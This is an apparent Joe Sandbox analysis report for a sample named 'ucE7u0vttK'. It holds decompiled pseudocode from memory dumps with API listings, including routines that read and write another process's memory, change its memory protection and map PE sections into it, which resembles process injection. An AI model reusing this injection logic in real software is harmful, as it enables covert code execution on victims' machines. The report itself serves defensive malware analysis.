      • Part of subcall function 00397131: GetCurrentProcessId.KERNEL32 ref: 00397174
      • Part of subcall function 00397131: GetCurrentThreadId.KERNEL32 ref: 0039717C
      • Part of subcall function 00397131: GetTickCount.KERNEL32 ref: 00397184
      • Part of subcall function 00397131: QueryPerformanceCounter.KERNEL32(?), ref: 00397190
    • GetStartupInfoW.KERNEL32(?,003B6B40,0000005C), ref: 003B244E
    • InterlockedCompareExchange.KERNEL32(003B8C3C,?,00000000), ref: 003B2476
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 40%
    			E003B24B9(void* __eax, long __ebx, LONG* __edi, void* __esi) {
    				void* _t17;
    				intOrPtr _t18;
    				int* _t19;
    				int _t20;
    				int _t22;
    				signed int _t25;
    				long _t28;
    				signed int _t31;
    				signed int _t34;
    				LONG* _t38;
    				void* _t40;
    
    				_t39 = __esi;
    				_t38 = __edi;
    				_t28 = __ebx;
    				_t17 = E003A1B59(0x3b3240, 0x3b324c); // executed
    				if(_t17 == 0) {
    					_t18 =  *0x3b8c38; // 0x2
    					__eflags = _t18 - __esi;
    					if(_t18 == __esi) {
    						_push(0x3b323c);
    						_push(0x3b3234); // executed
    						L003927A8(); // executed
    						 *0x3b8c38 = 2;
    					}
    					__eflags =  *((intOrPtr*)(_t40 - 0x20)) - _t28;
    					if( *((intOrPtr*)(_t40 - 0x20)) == _t28) {
    						InterlockedExchange(_t38, _t28);
    					}
    					__eflags =  *0x3b8c40 - _t28; // 0x0
    					if(__eflags != 0) {
    						_push(0x3b8c40);
    						_t25 = E00393D60(_t28, _t38, _t39, __eflags);
    						__eflags = _t25;
    						if(_t25 != 0) {
    							 *0x3b8c40(_t28, 2, _t28);
    						}
    					}
    					_t19 = __imp___wcmdln;
    					__eflags =  *_t19 - _t28;
    					if( *_t19 == _t28) {
    						L28:
    						 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
    						_t20 = 0xff;
    						goto L29;
    					} else {
    						_t22 =  *_t19;
    						while(1) {
    							 *(_t40 - 0x24) = _t22;
    							_t31 =  *_t22 & 0x0000ffff;
    							__eflags = _t31 - 0x20;
    							if(_t31 > 0x20) {
    								goto L22;
    							}
    							__eflags = _t31 - _t28;
    							if(_t31 == _t28) {
    								while(1) {
    									L14:
    									_t34 =  *_t22 & 0x0000ffff;
    									__eflags = _t34 - _t28;
    									if(_t34 == _t28) {
    										break;
    									}
    									__eflags = _t34 - 0x20;
    									if(_t34 > 0x20) {
    										break;
    									}
    									_t22 = _t22 + 2;
    									 *(_t40 - 0x24) = _t22;
    								}
    								__eflags =  *(_t40 - 0x40) & 0x00000001;
    								if(( *(_t40 - 0x40) & 0x00000001) == 0) {
    									_t31 = 0xa;
    								} else {
    									_t31 =  *(_t40 - 0x3c) & 0x0000ffff;
    								}
    								_push(_t31);
    								_push(_t22);
    								_push(_t28);
    								_push(0x390000); // executed
    								L0039FBF0(); // executed
    								 *0x3b8658 = _t22;
    								__eflags =  *0x3b864c - _t28; // 0x0
    								if(__eflags != 0) {
    									__eflags =  *0x3b865c - _t28; // 0x0
    									if(__eflags == 0) {
    										__imp___cexit();
    									}
    									 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
    									_t20 =  *0x3b8658; // 0x0
    									L29:
    									return E003B2829(_t20);
    								} else {
    									exit(_t22);
    									goto L22;
    								}
    							}
    							__eflags =  *(_t40 - 0x1c) - _t28;
    							if( *(_t40 - 0x1c) != _t28) {
    								goto L22;
    							}
    							goto L14;
    							L22:
    							__eflags = _t31 - 0x22;
    							if(_t31 == 0x22) {
    								__eflags =  *(_t40 - 0x1c) - _t28;
    								_t11 =  *(_t40 - 0x1c) == _t28;
    								__eflags = _t11;
    								 *(_t40 - 0x1c) = 0 | _t11;
    							}
    							_t22 = _t22 + 2;
    						}
    					}
    				}
    				goto L28;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 93%
    			E00393DD0(void* __eax) {
    				void* _t2;
    				void* _t4;
    				int _t5;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x208);
    				L0039A47E();
    				_t5 = __eax;
    				_t8 = _t7 + 4;
    				_t9 = __eax;
    				if(__eax == 0) {
    					 *0x3b8628 = 0;
    				} else {
    					memset(__eax, 0, 0x208);
    					_t8 = _t8 + 0xc;
    					 *0x3b8628 = _t5;
    				}
    				_t6 = 0x3b8048;
    				_t4 = 8;
    				do {
    					_t2 = E0039F250(_t9, _t6); // executed
    					_t8 = _t8 + 4;
    					_t6 = _t6 + 0x10;
    					_t4 = _t4 - 1;
    				} while (_t4 != 0);
    				return _t2;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00393DD7
    • memset.MSVCRT ref: 00393DED
      • Part of subcall function 0039F250: LoadLibraryW.KERNEL32(?), ref: 0039F278
      • Part of subcall function 0039F250: GetProcAddress.KERNEL32(00393E17,?), ref: 0039F2AD
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 94%
    			E00392E90(void* __ecx, intOrPtr _a4, char _a8) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v36;
    				char _v236;
    				char _v364;
    				short _v888;
    				char _v1412;
    				char _v1936;
    				char _v2960;
    				void* __ebx;
    				void* __edi;
    				void* _t45;
    				char _t46;
    				void* _t55;
    				void* _t58;
    				void* _t62;
    				long _t64;
    				void* _t67;
    				void* _t69;
    				intOrPtr _t90;
    				void* _t103;
    				void* _t104;
    				void* _t105;
    
    				_t103 = __ecx;
    				_t71 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				E0039E520( &_v36);
    				_t45 = E00397E20(_a8, 0,  &_v12, 0xffffffff);
    				_t105 = _t104 + 0x10;
    				_t107 = _t45;
    				if(_t45 == 0) {
    					L10:
    					_t46 = _v8;
    					L11:
    					if(_t46 != 0) {
    						E0039BB40(_t46);
    						_t105 = _t105 + 4;
    					}
    					L13:
    					_t47 = _v12;
    					if(_v12 != 0) {
    						E0039BB40(_t47);
    					}
    					E00397AD0( &_v36);
    					return _t71;
    				}
    				E00399090(_t107,  &_v236, 0x71);
    				_t90 =  *0x3b8628; // 0x593938
    				_t105 = _t105 + 8;
    				_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x10))))( &_v236, 0x105,  &_v1412, 0);
    				_t108 = _t55;
    				if(_t55 == 0) {
    					goto L10;
    				}
    				E00399090(_t108,  &_v236, 0x72);
    				_t13 = _t103 + 0x10; // 0xa06850ff
    				_push( *_t13);
    				_t58 = E003A0C10( &_v1936, 0x105,  &_v236,  &_v1412);
    				_t105 = _t105 + 0x1c;
    				_t109 = _t58;
    				if(_t58 < 0) {
    					goto L10;
    				}
    				E00399090(_t109,  &_v236, 0x73);
    				_push(_a4);
    				_t62 = E003A0C10( &_v888, 0x105,  &_v236,  &_v1936);
    				_t105 = _t105 + 0x1c;
    				if(_t62 < 0) {
    					goto L10;
    				}
    				_t64 = GetFileAttributesW( &_v888); // executed
    				if(_t64 == 0xffffffff) {
    					goto L10;
    				}
    				_t25 = _t103 + 0x44; // 0x89c933ff
    				_t67 = E00395F40( &_v36,  *((intOrPtr*)( *((intOrPtr*)( *_t25 + 8)))),  &_v888,  &_v8,  &_v16); // executed
    				if(_t67 == 0) {
    					goto L10;
    				}
    				_t46 = _v8;
    				if(_t46 == 0) {
    					goto L13;
    				}
    				_t85 = _v16;
    				if(_v16 > 0x800000) {
    					goto L11;
    				} else {
    					_push(0);
    					_t36 = _t103 + 0x40; // 0xfffa4885
    					_t69 = E003A0500(_t103, 0,  *_t36, _v12, _t46, _t85,  &_v2960,  &_v20,  &_a8,  &_v364); // executed
    					if(_t69 != 0) {
    						E00397AF0(0, _t103, _v20);
    						_t71 = 1;
    					}
    					goto L10;
    				}
    			}

    APIs
      • Part of subcall function 0039E520: CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
    • GetFileAttributesW.KERNELBASE(?), ref: 00392F93
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 40%
    			E00396D30() {
    				char _v8;
    				long _v12;
    				long _v16;
    				short _v20;
    				char _v24;
    				void _v100;
    				intOrPtr _t23;
    				intOrPtr _t27;
    				void* _t28;
    				int _t34;
    				intOrPtr _t38;
    				intOrPtr _t42;
    				intOrPtr _t50;
    				intOrPtr _t53;
    				void* _t55;
    
    				_t23 =  *0x3b8628; // 0x593938
    				_v12 = 0;
    				_v16 = 0;
    				_v24 = 0;
    				_v20 = 0x500;
    				_v8 = 0;
    				_t55 = 0;
    				_t8 = _t23 + 0x150; // 0x593a88
    				_push( *((intOrPtr*)( *((intOrPtr*)(_t23 + 0x100))))(8,  &_v12));
    				if( *((intOrPtr*)( *_t8))() != 0) {
    					_t34 = GetTokenInformation(_v12, 1,  &_v100, 0x4c,  &_v16); // executed
    					if(_t34 != 0) {
    						_t53 =  *0x3b8628; // 0x593938
    						_push( &_v8);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0x12);
    						_push(1);
    						_push( &_v24);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x158))))() != 0) {
    							_t38 =  *0x3b8628; // 0x593938
    							_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x14c))))(_v100, _v8);
    						}
    					}
    				}
    				_t27 = _v8;
    				if(_t27 != 0) {
    					_t50 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x154))))(_t27);
    				}
    				_t28 = _v12;
    				if(_t28 != 0) {
    					_t42 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xf8))))(_t28);
    				}
    				return _t55;
    			}

    APIs
    • GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00396D8D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 95%
    			E003917D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				char _v112;
    				char _v312;
    				void* _t30;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				intOrPtr _t43;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t62;
    
    				_t59 = __ecx;
    				_v8 = 0;
    				_v12 = 0;
    				E00399090(__eflags,  &_v312, 0x6c);
    				E00396CB0( &_v112, 0x95);
    				_t43 =  *0x3b8628; // 0x593938
    				_t62 = _t61 + 0x10;
    				_t39 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24))))( &_v112, __edi, __esi, __ebx),  &_v312);
    				if(_t25 != 0) {
    					_t30 = E00391170(_a4, 0,  &_v8, 0xffffffff);
    					_t62 = _t62 + 0x10;
    					if(_t30 != 0) {
    						_t31 =  *0x3b8628; // 0x593938
    						_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc))))(_v8);
    						_t15 = _t59 + 0x5c; // 0x8b000000
    						_t35 = E003926F0(_t59,  *_t15, _v8, _t32 + _t32 + 2); // executed
    						_t57 = _t35;
    						_t67 = _t57;
    						if(_t57 != 0) {
    							_push(_t57);
    							E003A0780(_t39, _t67, _t59, _t39, 1,  &_v12);
    							_t17 = _t59 + 0x5c; // 0x8b000000
    							_t62 = _t62 + 0x14;
    							E00391140( *_t17, _t57, 0, 0x8000); // executed
    						}
    					}
    				}
    				_t26 = _v8;
    				if(_v8 != 0) {
    					E0039BB40(_t26);
    				}
    				return _v12;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,?,0039FE81,?), ref: 0039181C
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00391140: VirtualFreeEx.KERNELBASE(4z9,?,00000000,00000000,?,003979B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00397A34), ref: 00391160
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 90%
    			E003965F0(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
    				char _v8;
    				char _v108;
    				char _v308;
    				void* __ebx;
    				_Unknown_base(*)()* _t20;
    				intOrPtr _t26;
    				void* _t27;
    				void* _t29;
    				intOrPtr _t33;
    				void* _t42;
    				void* _t44;
    
    				_t42 = __ecx;
    				_v8 = 0;
    				E00399090(__eflags,  &_v308, 0x6c);
    				E00396CB0( &_v108, 0x96);
    				_t33 =  *0x3b8628; // 0x593938
    				_t20 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x24))))( &_v108),  &_v308);
    				_t30 = _t20;
    				if(_t20 == 0) {
    					return _v8;
    				} else {
    					_t44 = _a8;
    					if(_t44 >= 0x10000) {
    						_t26 =  *0x3b8628; // 0x593938
    						_t27 =  *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x10c))))(_t44);
    						_t9 = _t42 + 0x5c; // 0x8b000000
    						_t29 = E003926F0(_t42,  *_t9, _t44, _t27 + 1); // executed
    						_t44 = _t29;
    					}
    					_t53 = _t44;
    					if(_t44 != 0) {
    						_push(_t44);
    						_push(_a4);
    						E003A0780(_t30, _t53, _t42, _t30, 2,  &_v8); // executed
    						if(_t44 >= 0x10000) {
    							_t12 = _t42 + 0x5c; // 0x8b000000
    							E00391140( *_t12, _t44, 0, 0x8000); // executed
    						}
    					}
    					return _v8;
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,?,00000000,0039C9A1), ref: 0039663A
      • Part of subcall function 00391140: VirtualFreeEx.KERNELBASE(4z9,?,00000000,00000000,?,003979B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00397A34), ref: 00391160
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 86%
    			E0039ED90(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
    				char _v12;
    				char _v20;
    				char _v28;
    				void* _t18;
    				intOrPtr _t21;
    				intOrPtr _t27;
    				intOrPtr _t28;
    				char* _t34;
    				intOrPtr _t35;
    				void* _t37;
    				long _t40;
    				intOrPtr* _t42;
    				intOrPtr* _t43;
    				intOrPtr* _t44;
    				void* _t45;
    				void* _t46;
    
    				_t46 = _t45 - 0x18;
    				_t40 = 0;
    				_t18 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_t37 = _t18;
    				if(_t37 != 0xffffffff) {
    					_push( &_v28);
    					_t21 =  *0x3b8628; // 0x593938
    					_push( &_v20);
    					_t34 =  &_v12;
    					_push(_t34);
    					_push(_t37);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t21 + 0x44))))() != 0) {
    						_t42 = _a8;
    						_t50 = _t42;
    						if(_t42 != 0) {
    							_t34 =  &_v12;
    							_t28 = E00391AF0(_t50, _t34);
    							_t46 = _t46 + 4;
    							 *_t42 = _t28;
    							 *((intOrPtr*)(_t42 + 4)) = _t34;
    						}
    						_t43 = _a12;
    						_t51 = _t43;
    						if(_t43 != 0) {
    							_t27 = E00391AF0(_t51,  &_v20);
    							_t46 = _t46 + 4;
    							 *_t43 = _t27;
    							 *((intOrPtr*)(_t43 + 4)) = _t34;
    						}
    						_t44 = _a16;
    						_t52 = _t44;
    						if(_t44 != 0) {
    							 *_t44 = E00391AF0(_t52,  &_v28);
    							 *((intOrPtr*)(_t44 + 4)) = _t34;
    						}
    						_t40 = 1;
    					}
    					_t35 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0xf8))))(_t37);
    				}
    				return _t40;
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0039FE81,?,00394D1E,?,00000000,00000000,?), ref: 0039EDB6
      • Part of subcall function 00391AF0: __aulldiv.INT64 ref: 00391B04
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039F5D0(void* __eflags, intOrPtr _a4) {
    				void* __esi;
    				signed char _t7;
    				void* _t13;
    				void* _t15;
    				WCHAR* _t16;
    
    				_t13 = 0;
    				_t16 = E0039C7B0(_t15, __eflags, _a4);
    				if(_t16 == 0) {
    					L5:
    					return _t13;
    				} else {
    					_t7 = GetFileAttributesW(_t16); // executed
    					if(_t7 == 0xffffffff || (_t7 & 0x00000010) != 0) {
    						_t13 = 0;
    						__eflags = 0;
    						E0039BB40(_t16);
    						goto L5;
    					} else {
    						E0039BB40(_t16);
    						return 1;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0039C7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 0039C828
    • GetFileAttributesW.KERNELBASE(00000000,00000000,00000001,00000000,?,00398FAF,00000000,00000000,00398A9D,00000000,00000000,00000000,00000000,?,00000001), ref: 0039F5F3
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039E850(intOrPtr* __ecx) {
    				void* _t4;
    				intOrPtr _t8;
    				intOrPtr _t13;
    				intOrPtr* _t14;
    				intOrPtr* _t15;
    
    				_t15 = __ecx;
    				_t14 = __ecx + 4;
    				 *_t14 = 0;
    				 *__ecx = 0;
    				_t4 = E003936C0();
    				if(_t4 != 0) {
    					_t13 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t13 + 0x1c4))))(0x3b638c, 0, 1, 0x3b617c, _t14); // executed
    					return _t15;
    				} else {
    					_t8 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t8 + 0x1c4))))(0x3b614c, _t4, 1, 0x3b612c, _t15);
    					return _t15;
    				}
    			}

    APIs
    • CoCreateInstance.OLE32(003B638C,00000000,00000001,003B617C,?), ref: 0039E8A7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00396CD0(void* __ecx, void* _a4, void* _a8, void* _a12, long _a16) {
    				long _v8;
    				int _t13;
    				long _t22;
    
    				_t22 = _a16;
    				_v8 = 0;
    				_t13 = ReadProcessMemory(_a4, _a8, _a12, _t22,  &_v8); // executed
    				if(_t13 != 0) {
    					return 0 | _v8 == _t22;
    				} else {
    					return _t13;
    				}
    			}

    APIs
    • ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCD4,?,?,?,00000070,00000000), ref: 00396CF9
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00397B30(void* __ecx, void* _a4, void* _a8, void* _a12, long _a16) {
    				long _v8;
    				int _t13;
    				long _t22;
    
    				_t22 = _a16;
    				_v8 = 0;
    				_t13 = WriteProcessMemory(_a4, _a8, _a12, _t22,  &_v8); // executed
    				if(_t13 != 0) {
    					return 0 | _v8 == _t22;
    				} else {
    					return _t13;
    				}
    			}

    APIs
    • WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039D9D0(void* __ecx, void* _a4, void* _a8, long _a12, long _a16) {
    				long _v8;
    				int _t11;
    
    				_v8 = 0;
    				_t11 = VirtualProtectEx(_a4, _a8, _a12, _a16,  &_v8); // executed
    				return _t11;
    			}

    APIs
    • VirtualProtectEx.KERNELBASE(0039FEDD,00000040,00002000,?,0039FE81,0039FE81,?,0039B4CC,0039C9A1,00000000,?,00000002,0039C9A1,00000000,C45D89F0,?), ref: 0039D9F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 85%
    			E0039B4FC(void* __esi) {
    				int _t146;
    				void* _t149;
    				signed int _t150;
    				void* _t155;
    				void* _t157;
    				signed int _t160;
    				intOrPtr _t169;
    				signed int _t171;
    				signed int _t172;
    				signed int _t178;
    				signed int* _t188;
    				int _t191;
    				signed int _t192;
    				intOrPtr _t196;
    				signed int _t197;
    				signed int _t201;
    				signed int _t204;
    				intOrPtr _t206;
    				signed int _t207;
    				intOrPtr _t208;
    				signed int _t210;
    				signed int* _t212;
    				signed int _t213;
    				void* _t214;
    				int _t216;
    				void* _t218;
    				signed int* _t220;
    				signed int _t223;
    				signed int _t224;
    				intOrPtr* _t227;
    				intOrPtr* _t232;
    				void* _t238;
    				int _t239;
    				void* _t240;
    				intOrPtr _t241;
    				signed int _t242;
    				signed int _t243;
    				signed int _t244;
    				int* _t249;
    				signed short* _t254;
    				intOrPtr _t264;
    				signed int _t265;
    				signed int _t267;
    				intOrPtr _t272;
    				void* _t278;
    				unsigned int _t284;
    				unsigned short _t287;
    				int _t305;
    				intOrPtr _t308;
    				intOrPtr* _t318;
    				signed int _t319;
    				signed int _t321;
    				intOrPtr _t322;
    				void* _t324;
    				intOrPtr* _t325;
    				signed int _t326;
    				void* _t327;
    				void* _t329;
    				signed int _t330;
    				void* _t331;
    				void* _t333;
    				void* _t335;
    
    				_t331 = __esi;
    				do {
    					_t249 =  *(_t333 - 0x10);
    					_t146 =  *(_t249 - 8);
    					_t239 =  *_t249;
    					if(_t146 > _t239) {
    						_t239 = _t146;
    					}
    					_t4 =  *(_t333 - 0x10) - 4; // 0xffffa6cf
    					_t149 =  *_t4 +  *((intOrPtr*)(_t333 - 8));
    					_push(4);
    					_push(0x1000);
    					_push(_t239);
    					_push(_t149);
    					_push( *((intOrPtr*)(_t333 + 8)));
    					E003A1E80(); // executed
    					_t316 = _t149;
    					if(_t149 == 0) {
    						L78:
    						_pop(_t240);
    						__eflags =  *(_t331 + 0x70);
    						if( *(_t331 + 0x70) == 0) {
    							E00397920(_t240, _t331);
    						}
    						_t150 =  *(_t333 - 0x20);
    						__eflags = _t150;
    						if(_t150 != 0) {
    							E0039BB40(_t150);
    						}
    						_t145 = _t331 + 0x58; // 0x9b8d00
    						return  *_t145;
    					}
    					_t155 = E003A1D90(_t239,  *(_t333 - 0x20)); // executed
    					 *(_t333 - 0x20) = _t155;
    					memset(_t155, 0, _t239);
    					_t335 = _t335 + 0x14;
    					_t157 = E00397B30(_t331,  *((intOrPtr*)(_t333 + 8)), _t316,  *(_t333 - 0x20), _t239); // executed
    					if(_t157 == 0) {
    						goto L78;
    					}
    					_t254 =  *(_t333 - 0x10);
    					_t158 =  *_t254;
    					if( *_t254 == 0) {
    						goto L8;
    					}
    					_t12 =  &(_t254[2]); // 0xfe78858d
    					_t13 = _t331 + 0x74; // 0xffff95d7
    					_t238 = E00397B30(_t331,  *((intOrPtr*)(_t333 + 8)), _t316,  *_t12 +  *_t13, _t158); // executed
    					if(_t238 == 0) {
    						goto L78;
    					}
    					L8:
    					 *(_t333 - 0x10) =  &(( *(_t333 - 0x10))[0x14]);
    					_t160 =  *(_t333 - 0x18) + 1;
    					 *(_t333 - 0x18) = _t160;
    				} while (_t160 < ( *( *((intOrPtr*)(_t333 - 4)) + 6) & 0x0000ffff));
    				if( *(_t333 - 0xc) == 0) {
    					L21:
    					_t318 =  *((intOrPtr*)(_t333 - 0x1c));
    					if(_t318 == 0) {
    						L42:
    						_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t333 - 4)) + 0x78));
    						 *((intOrPtr*)(_t333 - 0x1c)) = _t241;
    						_t319 = E0039DF30(_t331, _t241);
    						 *(_t333 - 0x18) = _t319;
    						__eflags = _t319;
    						if(_t319 == 0) {
    							goto L78;
    						}
    						 *(_t333 - 0x14) = E0039DF30(_t331,  *((intOrPtr*)(_t319 + 0x1c)));
